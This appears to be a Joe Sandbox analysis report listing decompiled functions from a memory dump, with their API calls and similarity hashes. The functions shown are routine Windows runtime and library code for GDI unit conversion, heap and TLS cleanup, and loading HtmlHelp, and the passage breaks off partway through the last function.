Function 0041A5D4, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041A5D4(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t22;
				int _t32;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t22 =  *0x446590; // 0x60
					_t12 =  *0x446594; // 0x60
					goto L6;
				} else {
					_t32 = GetMapMode( *(__ecx + 8));
					if(_t32 >= 7 || _t32 == 1) {
						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E0040E4C1(__ecx, _a4);
						_push(_t32);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

APIs

GetMapMode.GDI32(?,?,?,?,?,?,004142E1,?,00000000,0000001C,00414C4F,?,?,?,?,?), ref: 0041A5E4
GetDeviceCaps.GDI32(?,00000058), ref: 0041A61E
GetDeviceCaps.GDI32(?,0000005A), ref: 0041A627

Part of subcall function 0040E4C1: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E501
Part of subcall function 0040E4C1: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E51E

MulDiv.KERNEL32(?,000009EC,00000060), ref: 0041A64B
MulDiv.KERNEL32(00000000,000009EC,?), ref: 0041A656

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 3008489b0365817b233b9e7bda17715b36219956bc4785caf84b3ef8eede7486
Instruction ID: b67f60aca54f694c5be954c7caf55a9921f0b6cf90a1da25102bc38903e6d2d6
Opcode Fuzzy Hash: 3008489b0365817b233b9e7bda17715b36219956bc4785caf84b3ef8eede7486
Instruction Fuzzy Hash: 22112135700A00AFDB21AF56CC44C5EBFF9EF89310B15482AFA8697360C775AC528F95

Uniqueness

Uniqueness Score: -1.00%

Function 0041A662, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041A662(intOrPtr* __ecx, int* _a4) {
				int _v8;
				int _t12;
				int _t14;
				int _t30;
				int _t33;
				int* _t36;

				_push(__ecx);
				_t35 = __ecx;
				if(__ecx == 0) {
					_t30 =  *0x446590; // 0x60
					_t12 =  *0x446594; // 0x60
					goto L6;
				} else {
					_t33 = GetMapMode( *(__ecx + 8));
					if(_t33 >= 7 || _t33 == 1) {
						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
						L6:
						_t36 = _a4;
						_v8 = _t12;
						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
						_t36[1] = _t14;
					} else {
						_push(3);
						 *((intOrPtr*)( *__ecx + 0x34))();
						E0040E458(__ecx, _a4);
						_push(_t33);
						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
					}
				}
				return _t14;
			}

APIs

GetMapMode.GDI32(?,00000000,?,?,?,?,00414325,?,?,?,?,?,?), ref: 0041A672
GetDeviceCaps.GDI32(?,00000058), ref: 0041A6AC
GetDeviceCaps.GDI32(?,0000005A), ref: 0041A6B5

Part of subcall function 0040E458: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E498
Part of subcall function 0040E458: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E4B5

MulDiv.KERNEL32(?,00000060,000009EC), ref: 0041A6D9
MulDiv.KERNEL32(00000000,?,000009EC), ref: 0041A6E4

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CapsDevice$Mode
String ID:
API String ID: 696222070-0
Opcode ID: 386dc1262c4054650f02494d28b98613bbfe5b95c5fa278da0b1572231e24210
Instruction ID: d964a8700f0a9f0458d188cf6e9d936817c2b57de253648240f01c4d5d8773f5
Opcode Fuzzy Hash: 386dc1262c4054650f02494d28b98613bbfe5b95c5fa278da0b1572231e24210
Instruction Fuzzy Hash: 2811EC36200600AFDB21AF56CC4485EBBA9EF89750B15042AEA8597360C735AC618F99

Uniqueness

Uniqueness Score: -1.00%

Function 0041E18A, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 39%

			E0041E18A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x43f4c8);
				_t8 = E00421418(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E0042145D(_t8);
				}
				if( *0x448500 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x4468d0, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E0041F8D2(_t31);
						 *_t10 = E0041F897(GetLastError());
					}
					goto L9;
				}
				E00422E2D(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E00422EA6(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E00422ED1();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E0041E1E0();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

APIs

__lock.LIBCMT ref: 0041E1A8

Part of subcall function 00422E2D: __mtinitlocknum.LIBCMT ref: 00422E41
Part of subcall function 00422E2D: __amsg_exit.LIBCMT ref: 00422E4D
Part of subcall function 00422E2D: EnterCriticalSection.KERNEL32(D164E842,D164E842,00401B31,0041EDEB,00000004,0043F508,0000000C,004265BB,0041F8D7,0041F8D7,00000000,00000000,00000000,0042480F,00000001,00000214), ref: 00422E55

___sbh_find_block.LIBCMT ref: 0041E1B3
___sbh_free_block.LIBCMT ref: 0041E1C2
HeapFree.KERNEL32(00000000,00401B31,0043F4C8,0000000C,00422E0E,00000000,0043F5F0,0000000C,00422E46,00401B31,D164E842,00401B31,0041EDEB,00000004,0043F508,0000000C), ref: 0041E1F2
GetLastError.KERNEL32(?,?,0041F8D7,0041ED60,?,00401B31,00009618), ref: 0041E203

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: ed7969cd77516ed4267cd81e9382d96ea1eba9d66f8e0a941e0b3196f476ecab
Instruction ID: 4d9d38d2205d8855a1f8cf274a38df5ed94e4e206fa5bf874766943ed1e83e44
Opcode Fuzzy Hash: ed7969cd77516ed4267cd81e9382d96ea1eba9d66f8e0a941e0b3196f476ecab
Instruction Fuzzy Hash: E801A775A01211B6DF207BB3AC05BCF3B64AF12768F50016FF804A6191CF3C89819A5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040F63E, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F63E(long* __ecx) {
				intOrPtr _t4;
				long _t5;
				void* _t6;
				void* _t13;
				intOrPtr _t14;
				long* _t15;

				_t15 = __ecx;
				_t4 =  *((intOrPtr*)(__ecx + 0x14));
				if(_t4 != 0) {
					do {
						_t14 =  *((intOrPtr*)(_t4 + 4));
						E0040F496(__ecx, _t4, 0);
						_t4 = _t14;
					} while (_t14 != 0);
				}
				_t5 =  *_t15;
				if(_t5 != 0xffffffff) {
					TlsFree(_t5);
				}
				_t6 = _t15[4];
				if(_t6 != 0) {
					_t13 = GlobalHandle(_t6);
					GlobalUnlock(_t13);
					_t6 = GlobalFree(_t13);
				}
				DeleteCriticalSection( &(_t15[7]));
				return _t6;
			}

APIs

TlsFree.KERNEL32(?), ref: 0040F664
GlobalHandle.KERNEL32(?), ref: 0040F672
GlobalUnlock.KERNEL32(00000000), ref: 0040F67B
GlobalFree.KERNEL32 ref: 0040F682
DeleteCriticalSection.KERNEL32 ref: 0040F68C

Part of subcall function 0040F496: EnterCriticalSection.KERNEL32(?), ref: 0040F4F3
Part of subcall function 0040F496: LeaveCriticalSection.KERNEL32(?,?), ref: 0040F503
Part of subcall function 0040F496: LocalFree.KERNEL32(?), ref: 0040F50C
Part of subcall function 0040F496: TlsSetValue.KERNEL32(?,00000000), ref: 0040F51E

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
String ID:
API String ID: 1549993015-0
Opcode ID: 4ebfcc552ce60e9350f864b909ed5a038f7db9c8f2cc127d9fe14b17d68fdd27
Instruction ID: 36f76e17889f8822f579ccbac83d4f0dccc08baf364ee29f70bbc8cc12851e33
Opcode Fuzzy Hash: 4ebfcc552ce60e9350f864b909ed5a038f7db9c8f2cc127d9fe14b17d68fdd27
Instruction Fuzzy Hash: 4BF054312006005BD7319B79AC4CAAB76A9AFE57117160A7AF815E36E0DB39EC06466C

Uniqueness

Uniqueness Score: -1.00%

Function 0040AD88, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040AD88(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E0040FA7F(__ebx, _t25, __ebp, 0xc);
				_push(E0040A257);
				_t26 = E0040F0A3(__ebx, 0x446410, __edi, _t25, _t28);
				_t29 = _t26;
				if(_t26 == 0) {
					E004037E3(_t21, 0x446410, __edi, _t26, _t29);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E0040FAEC(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E004088A1(_t21, 0x446410, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

APIs

Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FABB
Part of subcall function 0040FA7F: InitializeCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FACA
Part of subcall function 0040FA7F: LeaveCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAD7
Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAE3

Part of subcall function 0040F0A3: __EH_prolog3_catch.LIBCMT ref: 0040F0AA

Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 0040ADCC
FreeLibrary.KERNEL32(?), ref: 0040ADDC

Strings

hhctrl.ocx, xrefs: 0040ADB0
HtmlHelpA, xrefs: 0040ADC6

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: 58f225088544d86e35bf3fc3a8f2d09a2203108614b982aa3c617d390dbfef24
Instruction ID: 6b69f8713619981bd23f7052f209581d6a0912bbed647a4ce728f8c290688269
Opcode Fuzzy Hash: 58f225088544d86e35bf3fc3a8f2d09a2203108614b982aa3c617d390dbfef24
Instruction Fuzzy Hash: D501D1312447029BDB20BB61DD0AB4B7AD5AF54B1AF10883FF04AB19D0C77D88209A1B

Uniqueness

Uniqueness Score: -1.00%

Function 0042CD6B, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0042CD6B(intOrPtr _a4) {
				intOrPtr _t2;
				struct _CRITICAL_SECTION* _t3;

				_t2 = _a4;
				if(_t2 < 0x4442e0 || _t2 > 0x444540) {
					_t3 = _t2 + 0x20;
					EnterCriticalSection(_t3);
					return _t3;
				} else {
					return E00422E2D((_t2 - 0x4442e0 >> 5) + 0x10);
				}
			}

0x0042cd6b
0x0042cd76
0x0042cd8f
0x0042cd93
0x0042cd99
0x0042cd7f
0x0042cd8e
0x0042cd8e

APIs

__lock.LIBCMT ref: 0042CD88

Part of subcall function 00422E2D: __mtinitlocknum.LIBCMT ref: 00422E41
Part of subcall function 00422E2D: __amsg_exit.LIBCMT ref: 00422E4D
Part of subcall function 00422E2D: EnterCriticalSection.KERNEL32(D164E842,D164E842,00401B31,0041EDEB,00000004,0043F508,0000000C,004265BB,0041F8D7,0041F8D7,00000000,00000000,00000000,0042480F,00000001,00000214), ref: 00422E55

EnterCriticalSection.KERNEL32(?,00430745,?,0043FA38,0000000C,0042DD98,004442E0,0043F9D0,00000010,0042CD5E), ref: 0042CD93

Strings

BD, xrefs: 0042CD6F
@ED, xrefs: 0042CD78

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
String ID: @ED$BD
API String ID: 3996875869-3832678117
Opcode ID: 503268f211cf52a4469befdf8a4a9e20235ed1abf2cdd69c48b13340ed74ff3b
Instruction ID: bb51faa7ff948615fe3c82eba944c30b4e22731db9a053301acaced63cb2b748
Opcode Fuzzy Hash: 503268f211cf52a4469befdf8a4a9e20235ed1abf2cdd69c48b13340ed74ff3b
Instruction Fuzzy Hash: 9FD022FA71012027EF2816B2BECAB1E2608D2C03423A54E3BF502C6281CE2DEAC1100C

Uniqueness

Uniqueness Score: -1.00%

Function 0042AD70, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0042AD70() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x438170;
					_v28 =  *0x438168;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0042244D), ref: 0042AD75
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0042AD85

Strings

IsProcessorFeaturePresent, xrefs: 0042AD7F
KERNEL32, xrefs: 0042AD70

Memory Dump Source

Source File: 00000003.00000002.613869877.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.613854761.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.613975412.0000000000434000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.614010074.0000000000442000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614021943.0000000000446000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.614037174.0000000000449000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_dot3hc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 647a90eff25c5521bd3327aad01c29093d74d5d1ebfe396131cc2a91f97f7659
Instruction ID: cd959e317abe6be5cb1291d7da4cfedc1d6fa2a895f225a505106cb1dce581d7
Opcode Fuzzy Hash: 647a90eff25c5521bd3327aad01c29093d74d5d1ebfe396131cc2a91f97f7659
Instruction Fuzzy Hash: 64C0809035131357DD1117B1AC0D71B301D5B44B83F6024567809E45C0DE5CE010442F

Uniqueness

Uniqueness Score: -1.00%

Function 0041733F, Relevance: 6.3, APIs: 4, Instructions: 309
memoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E0041733F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
				signed int _v4;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				void* _v40;
				char _v124;
				void* _v168;
				void* _v176;
				void* _v184;
				void* _v196;
				signed int* __ebp;
				signed int _t132;
				signed int _t138;
				signed int _t139;
				void* _t140;
				intOrPtr* _t145;
				intOrPtr* _t148;
				signed int _t149;
				signed int _t151;
				intOrPtr* _t152;
				void* _t154;
				intOrPtr* _t158;
				signed int _t163;
				intOrPtr _t164;
				intOrPtr* _t166;
				intOrPtr* _t168;
				void* _t179;
				intOrPtr _t182;
				signed int _t183;
				signed int _t185;
				signed int* _t186;
				void* _t187;
				intOrPtr* _t188;
				signed int _t202;
				signed int _t204;
				intOrPtr _t214;
				intOrPtr _t220;
				intOrPtr* _t222;
				intOrPtr _t223;
				signed int _t225;
				void* _t228;
				void* _t229;
				void* _t230;
				void* _t231;
				void* _t232;

				_t188 = __ecx;
				_t181 = __ebx;
				_t232 = _t231 - 0x74;
				_t225 =  &_v124;
				_t132 =  *0x443590; // 0x8ffedb05
				_a116 = _t132 ^ _t225;
				_push(0x1c);
				E0041F6EA(E004331D4, __ebx, __edi, __esi);
				_t222 = __ecx;
				_v16 =  *((intOrPtr*)(__ecx + 0x14));
				_a4 =  *((intOrPtr*)(__ecx + 0x10));
				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
					_t138 =  *(__ecx + 8);
					__eflags = _t138;
					if(_t138 != 0) {
						_t215 =  &_a12;
						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x439330,  &_a12,  &_a8);
						__eflags = _t139;
						if(_t139 >= 0) {
							E00413D5B( &_a12,  &_a20, 0x439a5c);
							_a52 = _a52 | 0xffffffff;
							_a44 = 0;
							_a48 = 0;
							_a56 = 0x18;
							_a60 = 0;
							_a64 = 0x1fb;
							E00413D5B( &_a12,  &_a68, 0x439a44);
							_t145 = _a12;
							_a100 = _a100 | 0xffffffff;
							_t215 =  &_a20;
							_a92 = 0x1c;
							_a96 = 0;
							_a104 = 0x20;
							_a108 = 0;
							_a112 = 0x1e;
							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
							__eflags = _t183;
							if(_t183 >= 0) {
								_t215 = 0;
								_v40 = _a8;
								_t148 = _a12;
								_v36 = 1;
								_v32 = 0;
								_v28 = 0;
								_v24 = 0;
								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
								__eflags = _t149;
								 *_t225 = _t149;
								if(_t149 >= 0) {
									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
									_t151 = _v20;
									_a8 = _t151;
									 *(_t222 + 0x10) = _t151;
									_t152 = _a12;
									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
									 *((intOrPtr*)( *_t152 + 8))(_t152);
									goto L32;
								} else {
									_t166 = _a12;
									 *((intOrPtr*)( *_t166 + 8))(_t166);
								}
								goto L50;
							} else {
								_t168 = _a12;
								 *((intOrPtr*)( *_t168 + 8))(_t168);
								_t139 = _t183;
							}
						}
					} else {
						_t139 = 0;
					}
					goto L51;
				} else {
					__eax =  *(__esi + 0x4c);
					__ecx =  *__eax;
					__edx =  &_a16;
					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x439540, __edx);
					__eflags = __eax;
					 *__ebp = __eax;
					if(__eax < 0) {
						L51:
						 *[fs:0x0] = _v12;
						_pop(_t220);
						_pop(_t223);
						_pop(_t182);
						_t140 = E0041E5DF(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
						__eflags =  &_a120;
						return _t140;
					} else {
						__eax = _a16;
						__ecx =  *__eax;
						__edx =  &_a8;
						_push( &_a8);
						_push(0x439520);
						_push(__eax);
						__eflags = __eax;
						if(__eflags >= 0) {
							__eax = _a8;
							__edx =  &_a12;
							_push( &_a12);
							_push(0x439660);
							_a12 = 0;
							__ecx =  *__eax;
							_push(__eax);
							__eflags = __eax;
							if(__eflags >= 0) {
								__eax = _a12;
								__ecx =  *__eax;
								__edx = __esi + 0x58;
								__edx =  *(__esi + 4);
								__edx =  *(__esi + 4) + 0xe8;
								__eflags = __edx;
								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
								__eax = _a12;
								__ecx =  *__eax;
								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
							}
							__eax = _a8;
							__ecx =  *__eax;
							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						}
						__eax = E00402EE1(__eflags, 0x14);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E00416B92(__eax, _a16);
						}
						 *(__esi + 0x50) = __eax;
						__eax = _a16;
						__ecx =  *__eax;
						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
						__eax =  *(__esi + 0x50);
						__ecx =  *__eax;
						__eflags =  *__eax - __edi;
						if(__eflags != 0) {
							__eflags = __eax;
							__eax = E00413F84(__ecx, __eax);
						}
						__eax = E00402EE1(__eflags, 0x28);
						__eflags = __eax - __edi;
						if(__eax == __edi) {
							__eax = 0;
							__eflags = 0;
						} else {
							__ecx = __eax;
							__eax = E00412BEB(__eax, __edi, 0x1f40);
						}
						__edx =  *(__esi + 0x50);
						 *(__esi + 0x54) = __eax;
						__ecx = __eax;
						__eax =  *(__esi + 0x54);
						__ecx =  *(__esi + 0x50);
						 *(__ecx + 8) =  *(__esi + 0x54);
						__eax =  *(__esi + 0x54);
						__eax =  *( *(__esi + 0x54) + 0xc);
						__eflags = __eax - 0x3333333;
						 *(__esi + 0x10) = __eax;
						if(__eax <= 0x3333333) {
							__eax = __eax * 0x28;
							__imp__CoTaskMemAlloc(__eax);
							__ecx = 0;
							__eflags = __eax - __edi;
							__ecx = 0 | __eflags != 0x00000000;
							 *(__esi + 0x14) = __eax;
							if(__eflags != 0) {
								 *(__esi + 0x10) =  *(__esi + 0x10) * 0x28;
								__eax = E0041F330(__edi, __eax, __edi,  *(__esi + 0x10) * 0x28);
								__ecx =  *(__esi + 0x50);
								__eax = E00416BB4( *(__esi + 0x50));
								__ecx =  *(__esi + 0x50);
								__eax = E00413F41(__ecx);
								L32:
								__eflags =  *(_t222 + 0x10);
								_a16 = 0;
								if( *(_t222 + 0x10) > 0) {
									_t187 = 0;
									__eflags = 0;
									do {
										_t163 = E00402EE1(__eflags, 0x1c);
										_a8 = _t163;
										__eflags = _t163;
										_v4 = 0;
										if(_t163 == 0) {
											_t164 = 0;
											__eflags = 0;
										} else {
											_t164 = E0041A1D8(_t163, 0xa);
										}
										_v4 = _v4 | 0xffffffff;
										_a16 = _a16 + 1;
										 *((intOrPtr*)(_t187 +  *((intOrPtr*)(_t222 + 0x14)) + 0x24)) = _t164;
										_t187 = _t187 + 0x28;
										__eflags = _a16 -  *(_t222 + 0x10);
									} while (__eflags < 0);
								}
								_t185 = _v16;
								__eflags = _t185;
								if(_t185 != 0) {
									__eflags = _a4;
									if(_a4 > 0) {
										_t154 = 0xffffffdc;
										_t186 = _t185 + 0x24;
										_a16 = _a4;
										_a8 = _t154 - _v16;
										while(1) {
											_t202 =  *( *_t186 + 4);
											__eflags = _t202;
											_a4 = _t202;
											if(_t202 == 0) {
												goto L46;
											}
											while(1) {
												_t158 = E00406B97( &_a4);
												_t215 =  *_t222;
												 *((intOrPtr*)( *_t222 + 8))( *_t158, 1);
												__eflags = _a4;
												if(_a4 == 0) {
													goto L46;
												}
											}
											L46:
											E0041A100( *_t186);
											_t204 =  *_t186;
											__eflags = _t204;
											if(_t204 != 0) {
												 *((intOrPtr*)( *_t204 + 4))(1);
											}
											_t186 =  &(_t186[0xa]);
											_t127 =  &_a16;
											 *_t127 = _a16 - 1;
											__eflags =  *_t127;
											if( *_t127 != 0) {
												continue;
											}
											goto L49;
										}
									}
									L49:
									__imp__CoTaskMemFree(_v16);
								}
								L50:
								_t139 =  *_t225;
								goto L51;
							} else {
								_push(_t225);
								_t228 = _t232;
								_push(_t188);
								 *((intOrPtr*)(_t228 - 4)) = 0x442350;
								E0041F7F4(_t228 - 4, 0x43c4ec);
								asm("int3");
								_push(_t228);
								_t229 = _t232;
								_push(_t188);
								_t10 = _t229 - 4; // 0x442350
								 *((intOrPtr*)(_t229 - 4)) = 0x4423e8;
								E0041F7F4(_t10, 0x43c54c);
								asm("int3");
								_push(_t229);
								_t230 = _t232;
								_push(_t188);
								_t12 = _t230 - 4; // 0x4423e8
								 *((intOrPtr*)(_t230 - 4)) = 0x442480;
								E0041F7F4(_t12, 0x43c590);
								asm("int3");
								_push(4);
